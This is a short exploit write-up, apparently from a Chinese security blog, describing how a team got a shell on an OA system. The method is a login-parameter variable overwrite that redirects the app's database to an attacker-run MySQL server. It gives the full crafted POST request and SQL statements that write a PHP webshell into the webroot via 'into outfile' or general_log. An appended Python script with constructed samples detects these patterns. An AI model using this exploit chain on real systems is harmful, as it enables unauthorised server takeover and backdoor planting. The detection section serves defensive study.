Vulnerability details: http://www.anquan.us/static/bugs/wooyun-2016-0168661.html
While the team was working through a target together we came across an OA system, dug through WooYun and found this report, and successfully got a shell.
Variable overwrite
Craft the login request packet:
POST /logincheck.php HTTP/1.1
Host: xx.xx.com
Content-Length: 182
Cache-Control: max-age=0
Origin: http://xx.xx.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xx.xx.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114
Connection: close

USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=123.123.123.123&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=rootpassword&MYOA_MASTER_DB[db]=oa&encode_type=1&button=
The MySQL connection settings in the body point at a MySQL server you have to set up yourself on the public internet, with remote connections enabled for root.
Download and import TD_OA.sql into it.
getshell
The backend has an SQL import feature, which gives two ways to write a file: `into outfile`, or `general_log`.
Using into outfile:
update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;

Using general_log:
set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '<?php assert($_POST[a]) ?>';
set global general_log = off;
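From the defender's side, both stages above leave recognisable traces: a login POST whose body carries keys named after the application's internal DB configuration array, and SQL statements that redirect the general log or `into outfile` into a `.php` path. The following detection script is an added example, not code from the original post or from the OA product; the log lines, the parameter prefixes and the pattern names are constructed assumptions for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request records (method, path, body), as a WAF or
# reverse proxy might log them; not real traffic from the write-up.
SAMPLE_REQUESTS = [
    ("POST", "/logincheck.php", "USERNAME=admin&PASSWORD=x&encode_type=1&button="),
    ("POST", "/logincheck.php",
     "USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=203.0.113.5"
     "&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=p&MYOA_MASTER_DB[db]=oa&encode_type=1"),
    ("GET", "/general/index.php", ""),
]

# Constructed SQL statements, as an import feature or query log might record them.
SAMPLE_SQL = [
    "select name from user where uid=1",
    "set global general_log_file = '../webroot/test.php'",
    "select 'x' into outfile '../webroot/test.php'",
    "update mysql.user set file_priv='Y' where user='root'",
]

# Parameter prefixes a client must never be allowed to supply: they name the
# application's internal DB configuration array (assumed from the request above).
FORBIDDEN_PARAM_PREFIXES = ("MYOA_MASTER_DB[", "MYOA_SLAVE_DB[")

def overridden_config_params(body: str) -> list:
    """Return client-supplied parameter names that collide with internal config."""
    params = parse_qs(body, keep_blank_values=True)
    return sorted(k for k in params if k.startswith(FORBIDDEN_PARAM_PREFIXES))

# Each pattern flags a statement that turns a SQL console into a file write.
SQL_PATTERNS = {
    "file_write_to_webroot": re.compile(r"into\s+outfile\s+'[^']*\.php'", re.I),
    "general_log_redirect": re.compile(r"general_log_file\s*=\s*'[^']*\.php'", re.I),
    "file_priv_grant": re.compile(r"set\s+file_priv\s*=\s*'Y'", re.I),
}

def classify_sql(stmt: str) -> list:
    """Return the names of suspicious patterns a statement matches (empty if clean)."""
    return [name for name, rx in SQL_PATTERNS.items() if rx.search(stmt)]

def scan(requests, statements) -> list:
    """Run both checks and return one finding tuple per hit."""
    findings = [("request", path, overridden_config_params(body))
                for _, path, body in requests if overridden_config_params(body)]
    findings += [("sql", s, classify_sql(s)) for s in statements if classify_sql(s)]
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS, SAMPLE_SQL):
        print(finding)
```

Against the constructed samples the scan yields one request finding (five overridden config keys) and three SQL findings.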
Original article by Y4er. Reproduction without authorization is prohibited; to reproduce it, contact the author: Y4er.